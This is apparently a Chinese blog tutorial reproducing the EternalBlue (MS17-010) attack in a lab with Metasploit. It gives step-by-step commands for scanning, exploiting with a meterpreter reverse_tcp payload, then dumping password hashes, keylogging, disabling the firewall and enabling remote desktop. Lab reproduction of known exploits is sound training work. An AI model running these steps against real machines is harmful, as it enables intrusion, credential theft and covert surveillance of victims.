获取靶机ip地址(自动获取ip地址怎么查看ip)
时间:2023-10-28 16:33:22 浏览量:25
2017年 网络上出现了可怕的 网络安全漏洞-永恒之蓝 其目的就是攻击者可以使用该漏洞远程获取目标主机的管理员权限。
网络拓扑
永恒之蓝复现,这里准备了两台电脑,一台攻击机 一台靶机。
测试图谱
1、在攻击机器中启动命令msfconsole
启动msfconsole
2、在攻击机中搜索漏洞模块ms17-010
搜索ms17-010模块
3、先调用搜索到的模块,在查看该模块的配置选项。
查看模块的配置选项
4、设置要攻击靶机的ip地址,如果不清楚具体目标IP地址,可以设置IP地址段,如:192.168.1.*)
设置攻击目标ip地址
5、确认设置配置信息后,开始对目标靶机进行扫描,并且进行攻击。
对目标靶机进行扫描
6、显示带有Host is likely VULNERABLE的有可能就是存在漏洞的机器。
发现有漏洞的机器
7、利用ms17-010的漏洞进行攻击,在msfconsole中调用攻击模块,并查看选项。
利用ms17-010模块进行攻击
注:如果payload不是当前这个,建议更改payload 使用set payload windows/x64/meterpreter/reverse_tcp这个。
8、输入目标主机的ip地址后,再输入run命令进行攻击
设置目标主机,开始进行攻击
9、输入run命令后,就能获取导目标主机的session
获取目标主机的session
10、获取到目标主机的session后常用命令。
注意:发现有乱码,可以使用chcp 65001命令消除乱码。
help #获取所有可用命令
getuid #获取当前权限
screenshot #截屏
hashdump #获取密码的hash
ps #获取进程列表
sysinfo #获取系统信息
route #获取路由表
getpid #获取当前攻入的进程pid
migrate #将当前后门注入迁移到其他程序
keyscan_start # 开启键盘记录
keyscan_dump #显示键盘记录 使用永恒之蓝攻入的session默认不能进行键盘记录 ,如果迁移到其他程序就可以做,比如notepad.exe
download/upload #上传下载文件
keyscan_stop # 监视键盘记录
bg # 回到metasploit界面
11、获取到目标主机的session之后,就可以完全拿到管理员权限进行远程控制。
打开和关闭系统防火墙。
打开和关闭目标主机的系统防火墙
开启目标主机的远程桌面命令
run getgui -e或者run post/windows/manage/enable_rdp
然后再攻击机中输入rdesktop 192.168.1.150打开目标主机的桌面。